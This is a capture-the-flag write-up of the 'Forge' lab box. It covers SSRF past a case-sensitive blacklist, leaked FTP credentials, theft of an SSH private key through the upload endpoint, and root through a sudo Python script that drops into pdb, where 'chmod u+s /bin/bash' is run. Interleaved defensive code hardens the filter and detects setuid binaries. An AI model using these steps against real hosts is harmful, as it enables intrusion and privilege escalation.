Forge
Nmap
➜ Forge nmap -sV -sC -T3 [Link] -oN nmap/[Link]
Starting Nmap 7.92 ( [Link] ) at 2021-09-12 17:20 +0530
Nmap scan report for [Link]
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 [Link] (RSA)
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to [Link]
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: [Link]; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at [Link] .
Nmap done: 1 IP address (1 host up) scanned in 77.36 seconds
➜ Forge
vhost enum
➜ Forge ffuf -w /usr/share/seclists/Discovery/DNS/[Link] -u [Link] -H "Host: [Link]" -t 200 -fl 10
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : [Link]
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/shubs-[Link]
:: Header : Host: [Link]
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response lines: 10
________________________________________________
admin [Status: 200, Size: 27, Words: 4, Lines: 2, Duration: 763ms]
:: Progress: [484699/484699] :: Job [1/1] :: 909 req/sec :: Duration: [Link] :: Errors: 0 ::
➜ Forge
port 80 is open
there's a subdomain called admin
found a vhost called [Link] (when we visit port 80 it redirects there)
we can't reach the admin subdomain directly, it's only accessible from localhost
if we go to the /uploads endpoint on [Link] we can see an interesting option to upload files via a link
if we try to access localhost from here the app tells us the domain is blacklisted
same for [Link]
but we can easily bypass this by writing [Link] in all caps
[Link]
after doing so we get a link, and if we curl it and view the content we notice an interesting endpoint called announcements
<!DOCTYPE html>
<html>
<head>
<title>Admin Portal</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/[Link]">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<br><br><br><br>
<br><br><br><br>
<center><h1>Welcome Admins!</h1></center>
</body>
</html>
so lets view the content of that endpoint
[Link]
<!DOCTYPE html>
<html>
<head>
<title>Announcements</title>
</head>
<body>
<link rel="stylesheet" type="text/css" href="/static/css/[Link]">
<link rel="stylesheet" type="text/css" href="/static/css/[Link]">
<header>
<nav>
<h1 class=""><a href="/">Portal home</a></h1>
<h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
<h1 class="align-right"><a href="/upload">Upload image</a></h1>
</nav>
</header>
<br><br><br>
<ul>
<li>An internal ftp server has been setup with credentials as user:heightofsecurity123!</li>
<li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
<li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.</li>
</ul>
</body>
</html>
and we have interesting stuff:
An internal ftp server has been setup with credentials as user:heightofsecurity123!
The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.
The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.
let's try to access the ftp first by passing the ftp url in the GET parameter to the admin vhost
[Link]
and we can see the content of the ftp share
drwxr-xr-x 3 1000 1000 4096 Aug 04 19:23 snap
-rw-r----- 1 0 1000 33 Sep 08 08:13 [Link]
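The blacklist bypass above (writing the host in capitals) and the ftp fetch in this step share one root cause: the /upload filter matches strings in the URL instead of deciding on the scheme and on the address the URL actually resolves to. The following is an added example, not code from the box or from this write-up. It contrasts a constructed case-sensitive substring blacklist with a hardened check that allow-lists the scheme (http/https only, so an ftp:// URL is refused outright), takes the host from urlparse (which lower-cases it), and rejects any address that is loopback, private, link-local or otherwise internal. The hostnames, the sample public address and fake_loopback_resolver are all constructed for the example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed stand-in for the kind of filter the write-up bypasses: a
# case-sensitive substring blacklist over the raw URL string. Not the box's code.
BLACKLIST = ("localhost", "127.0.0.1")


def weak_blacklist_allows(url: str) -> bool:
    """Returns True if the naive filter would fetch this URL ("LOCALHOST" slips through)."""
    return not any(bad in url for bad in BLACKLIST)


ALLOWED_SCHEMES = {"http", "https"}   # no ftp/ftps/file/gopher


def _is_internal(ip) -> bool:
    """Loopback, RFC 1918, link-local, multicast, reserved and 0.0.0.0/:: are all off limits."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def system_resolver(host: str) -> list:
    """Resolve a name to every address it maps to; empty list on failure (fail closed)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    # strip an IPv6 scope id such as %eth0 before parsing
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def fake_loopback_resolver(host: str) -> list:
    """Constructed resolver standing in for an internal vhost that points at 127.0.0.1."""
    return [ipaddress.ip_address("127.0.0.1")]


def hardened_allows(url: str, resolve=system_resolver) -> bool:
    """Allow-list the scheme, normalise the host, then decide on the resolved address."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname          # urlparse lower-cases this, so LOCALHOST == localhost
    if not host:
        return False
    if host == "localhost" or host.endswith(".localhost"):
        return False               # RFC 6761 names are known-bad without a lookup
    try:
        addresses = [ipaddress.ip_address(host)]   # IP literal, no lookup needed
    except ValueError:
        addresses = resolve(host)
    if not addresses:
        return False
    return not any(_is_internal(ip) for ip in addresses)


def compare(urls):
    """Run both checks side by side; returns {url: (weak_allows, hardened_allows)}."""
    return {u: (weak_blacklist_allows(u), hardened_allows(u)) for u in urls}


if __name__ == "__main__":
    # constructed sample inputs; 93.184.216.34 is a public address used only as an example
    for url, verdict in compare([
        "http://LOCALHOST/admin",
        "http://127.0.0.1/admin",
        "http://[::1]/admin",
        "ftp://93.184.216.34/pub/file",
        "http://93.184.216.34/image.png",
    ]).items():
        print(f"{url:40} weak={verdict[0]!s:5} hardened={verdict[1]}")
```

Checking once and then letting the HTTP client resolve again leaves a window for DNS rebinding, so in production the decision belongs on the address the client actually connects to (a custom resolver or connect hook), not only on the URL string. Going through the resolver rather than string matching also means alternative spellings of loopback that a substring filter never sees (on glibc, for example, decimal or octal dotted forms are normalised by the resolver) end up compared as addresses.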
so this must be the home dir of the user, so I checked the id_rsa key and it worked
[Link]
u=[Link]
and we get the key
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
for now we only have one username, user, which we found from the ftp, so let's try ssh with this username
ssh -i [Link] user@[Link]
after sshing in we can see that we can run a script as root
user@forge:~$ sudo -l
Matching Defaults entries for user on forge:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
User user may run the following commands on forge:
(ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/[Link]
user@forge:~$
and the content of the script is
#!/usr/bin/env python3
import socket
import random
import subprocess
import pdb

# random high port, bound to loopback only
port = random.randint(1025, 65535)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('127.0.0.1', port))
    sock.listen(1)
    print(f'Listening on localhost:{port}')
    (clientsock, addr) = sock.accept()
    clientsock.send(b'Enter the secret passsword: ')
    if clientsock.recv(1024).strip().decode() != 'secretadminpassword':
        clientsock.send(b'Wrong password!\n')
    else:
        clientsock.send(b'Welcome admin!\n')
        while True:
            clientsock.send(b'\nWhat do you wanna do: \n')
            clientsock.send(b'[1] View processes\n')
            clientsock.send(b'[2] View free memory\n')
            clientsock.send(b'[3] View listening sockets\n')
            clientsock.send(b'[4] Quit\n')
            # int() on anything that is not a number raises ValueError, which lands in the except below
            option = int(clientsock.recv(1024).strip())
            if option == 1:
                clientsock.send(subprocess.getoutput('ps aux').encode())
            elif option == 2:
                clientsock.send(subprocess.getoutput('df').encode())
            elif option == 3:
                clientsock.send(subprocess.getoutput('ss -lnt').encode())
            elif option == 4:
                clientsock.send(b'Bye\n')
                break
            # no else branch: other numbers are silently ignored
except Exception as e:
    print(e)
    # post-mortem debugger: an interactive Python prompt as the user running the script
    pdb.post_mortem(e.__traceback__)
finally:
    quit()
if you go through the script you can see there's a try/except block, and interestingly, if an exception happens it opens pdb
if you don't know, pdb is the Python debugger
so how can we exploit this? basically we need to raise an exception. if you check the if statement they don't handle an else case, and the input goes straight into int(), so if we send something that isn't one of the valid options, like a non-numeric string instead of 1-4, it raises an exception. so run the script as root and nc to the port from another terminal (ssh again and nc to that port)
user@forge:~$ sudo /usr/bin/python3 /opt/[Link]
Listening on localhost:42512
nc localhost 42512
and enter the password
secretadminpassword
now enter something invalid
user@forge:~$ nc localhost 17089
Enter the secret passsword: secretadminpassword
Welcome admin!
What do you wanna do:
[1] View processes
[2] View free memory
[3] View listening sockets
[4] Quit
hopeyoulikethewriteup
and since this input isn't handled, it raises an exception, and because of that pdb opens
except Exception as e:
    print(e)
    pdb.post_mortem(e.__traceback__)
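The except branch above is the whole bug: a post-mortem debugger is an interactive Python prompt running as whoever launched the script, here root via sudo. Below is an added example, not the script from /opt and not the author's code, showing the shape of a hardened version of the menu handler: the option is parsed behind a ValueError guard, out-of-range numbers get an "Invalid option" reply instead of falling through, commands run as fixed argv lists rather than shell strings (a swap from subprocess.getoutput), and the exception path logs the traceback and closes the socket. The password prompt and listener setup are left out; ScriptedSocket is a constructed stand-in for a client socket so the loop can be exercised offline.

```python
import logging
import subprocess

log = logging.getLogger("remote-manage")

# Menu text as the write-up shows it; the command behind option 2 is kept as in the script
MENU = (b"\nWhat do you wanna do: \n"
        b"[1] View processes\n"
        b"[2] View free memory\n"
        b"[3] View listening sockets\n"
        b"[4] Quit\n")

COMMANDS = {1: ["ps", "aux"], 2: ["df"], 3: ["ss", "-lnt"]}   # argv lists, no shell


def run_command(argv):
    """Run a fixed argv without a shell and return its stdout."""
    return subprocess.run(argv, capture_output=True, text=True).stdout


def parse_option(data: bytes):
    """Return the menu number, or None for anything that is not exactly 1-4."""
    try:
        option = int(data.strip())
    except ValueError:
        return None                     # bad input is a reply, not an exception path
    return option if option in (1, 2, 3, 4) else None


def handle_request(data: bytes, run=run_command):
    """One menu round. Returns (reply, keep_going); never raises on user input."""
    option = parse_option(data)
    if option is None:
        return b"Invalid option\n", True
    if option == 4:
        return b"Bye\n", False
    return run(COMMANDS[option]).encode(), True


def serve_connection(clientsock):
    """Session loop with the dangerous except-branch replaced by log-and-close."""
    try:
        clientsock.send(b"Welcome admin!\n")
        keep_going = True
        while keep_going:
            clientsock.send(MENU)
            data = clientsock.recv(1024)
            if not data:
                break                   # peer closed the connection
            reply, keep_going = handle_request(data)
            clientsock.send(reply)
    except Exception:
        # Log the traceback for the operator; never hand an interactive prompt
        # (pdb, code.interact, ...) to whoever is on the other end of the socket.
        log.exception("session failed")
    finally:
        clientsock.close()


class ScriptedSocket:
    """Constructed stand-in for a client socket, used to exercise serve_connection offline."""

    def __init__(self, inputs):
        self.inputs = list(inputs)
        self.sent = []
        self.closed = False

    def send(self, data):
        self.sent.append(data)

    def recv(self, _n):
        return self.inputs.pop(0) if self.inputs else b""

    def close(self):
        self.closed = True


if __name__ == "__main__":
    # constructed session: the write-up's junk input followed by Quit
    client = ScriptedSocket([b"hopeyoulikethewriteup", b"4"])
    serve_connection(client)
    for chunk in client.sent:
        print(chunk.decode(), end="")
```

With this shape the junk input that opened pdb in the write-up just produces "Invalid option" and the menu again; the sudoers entry is still worth revisiting, since a script that is only meant to run on loopback as root is a small surface that still deserves argument-free, non-interactive behaviour.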
so once we have pdb we can execute any Python command, so import os and set the suid bit on /bin/bash so that you can become root easily
(Pdb) import os
(Pdb) os.system('chmod u+s /bin/bash')
and you can see the suid bit is set on /bin/bash
user@forge:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
user@forge:~$
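The chmod u+s step leaves a clear artefact: /bin/bash showing up as -rwsr-xr-x root root, which is mode 0o104755 in stat terms. As an added detection example (not from the write-up), the following scans a filesystem for setuid-root regular files and reports those missing from a baseline. The BASELINE set and the entries used in the self-check are constructed; build the real baseline from a known-good image of the host.

```python
import os
import stat

# Baseline of setuid-root binaries expected on the host. Constructed example list,
# not taken from the target.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su"}


def is_setuid_root(mode: int, uid: int) -> bool:
    """True for a regular file with the setuid bit set and owned by uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def unexpected_setuid(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode, st_uid). Returns setuid-root paths not in baseline."""
    return sorted(path for path, mode, uid in entries
                  if is_setuid_root(mode, uid) and path not in baseline)


def walk_entries(root="/"):
    """Yield (path, st_mode, st_uid) for every file under root, staying on one filesystem."""
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        # prune other mounts (/proc, /sys, network shares) so the scan stays on root's filesystem
        kept = []
        for d in dirnames:
            try:
                if os.lstat(os.path.join(dirpath, d)).st_dev == root_dev:
                    kept.append(d)
            except OSError:
                continue
        dirnames[:] = kept
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


def self_check():
    """Constructed entries mirroring the write-up's end state; returns the flagged paths."""
    sample = [
        ("/usr/bin/sudo", 0o104755, 0),      # expected, in baseline
        ("/bin/bash", 0o104755, 0),          # -rwsr-xr-x root root, as in the write-up
        ("/usr/bin/python3", 0o100755, 0),   # root-owned but no setuid bit
        ("/home/user/tool", 0o104755, 1000), # setuid but not root-owned
    ]
    return unexpected_setuid(sample)


if __name__ == "__main__":
    print("self-check flags:", self_check())
    for path in unexpected_setuid(walk_entries("/")):
        print("unexpected setuid-root file:", path)
```

Run periodically (or from file-integrity tooling), the diff against the baseline is what surfaces this kind of persistence; a one-off `find / -perm -4000` gives the same raw list but nothing to compare it with.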
now get root and enjoy!
/bin/bash -p
bash-5.0# cd /root
bash-5.0# cat [Link]
eb2b840fca52fc3658cc011e4995f4af
bash-5.0#